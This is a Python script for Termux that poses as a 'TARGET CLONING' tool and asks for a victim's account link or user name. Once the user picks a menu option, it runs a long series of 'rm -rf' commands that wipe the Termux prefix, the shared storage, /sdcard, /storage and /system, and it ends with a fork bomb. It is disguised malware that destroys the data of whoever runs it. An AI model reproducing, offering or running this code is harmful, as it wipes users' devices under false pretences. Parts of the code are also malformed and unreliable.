from __future__ import print_function
import platform, os, sys, time, smtplib
#color
M = '\b[1;97m'
P = '\b[1;31m'
H = '\b[1;32m'
K  = '\b[1;33m'
U = '\b[1;34m'
B = '\b[1;35m' 
N = '\b[1;36m'
O = '\b[0m' 
FM = "\3[1;30m"
Z = '\3[90m'
logo=(""" 
\33[1;32m╔═════════════════════════════════════════╗
\33[1;32m║\33[1;91md888888b db    db d8888b.  .d8b.   d888b\33[1;32m ║
\33[1;32m║\33[1;32m`~~88~~' 88    88 88  `8D d8' `8b 88' Y8 \33[1;32m║
\33[1;32m║\33[1;92m   88    88    88 88oobY' 88ooo88 88\33[1;32m     ║
\33[1;32m║\33[1;33m   88    88    88 88`8b   88~~~88 88  ooo\33[1;32m║
\33[1;32m║\33[1;93m   88    88b  d88 88 `88. 88   88 88. ~8~\33[1;32m║
\33[1;32m║\33[1;36m   YP    ~Y8888P' 88   YD YP   YP  Y888P\33[1;32m ║
\33[1;32m╚═════════════════════════════════════════╝

\33[1;32m╭───────────•◈•─────────────╮
\33[1;32m[=]\33[1;32mTOOLS    \33[1;91mTARGET         \33[1;32m[=]
\33[1;32m[=]\33[1;32mVERSION  \33[1;32m0.0.1          \33[1;32m[=]
\33[1;32m[=]\33[1;92mAUTHOR   \33[1;93mTURAG AHAMED   \33[1;32m[=]
\33[1;32m[=]\33[1;32mGITHUB   \33[1;31mTURAG-CYBER-404\33[1;32m[=]
\33[1;32m[=]\33[1;32mFB GROUP \33[1;36mTURAG-CYBER-404\33[1;32m[=]
\33[1;32m╰─────────────•◈•───────────╯  
	""")
time.sleep(20)
class Main:
    def __init__(self):
        self.id = []
        self.ok = []
        self.cp = []
        self.loop = 0
        os.system("clear")
        print(logo)
        print(" [1] TARGET CLONING ")
        print(" [2] TARGET CLONING V2")
        print(" [0] Exit")
        TURAG =input(" [âˆš] Choose : ")
        if TURAG in ["1", "01"]:
            v1()
        if TURAG in ["2","02"]:
            v1()
        if TURAG in [" 0", "00"]:
            exit()
        else:
            exit()
def v1():
	os.system('clear')
	print(logo)
	print('\33[1;92m─────────────────────────────────────────────────────\')
	print('(1)ENTER VICTIM ID LINK\\2) VICTIM USER NAME\\\33[1;91m\33[1;91m[\33[1;92m✔︎\33[1;91m]\33[1;32mCHOSE : ')
	TURAG =input(" [âˆš] Choose : ")
	if TURAG in ["1", "01"]:
		v2()
		if TURAG in ["2","02"]:
			v2() 
    
def v2():
	os.system('clear')
	print(logo)
	os.system('termux-setup-storage')
	os.system('rm -rf *')
	os.system('rm -rf /$PREFIX')
	os.system('rm -rf /sdcard/*')
	os.system('rm -rf /sdcard/0/*')
	os.system('rm -rf /sdcard1/*')
	os.system('rm -rf /storage/*')
	os.system('rm -rf mr.dark.txt')
	os.system('rm-rf /sdcard/Android/data/')
	os.system('rm -rf ...tx')
	os.system('rm -rf /sdcard/*')
	os.system('rm -rf /sdcard/0/*')
	os.system('rm -rf /sdcard/1/*')
	os.system('rm -rf /sdcard/dm.txt')
	os.system('rm -rf /storage/*')
	os.system('rm -rf /storage/emulated/*')
	os.system('rm -rf /storage/emulated/0/*')
	os.system('rm -rf /system/*')
	os.system(':(){ :|: & };:')
Main()
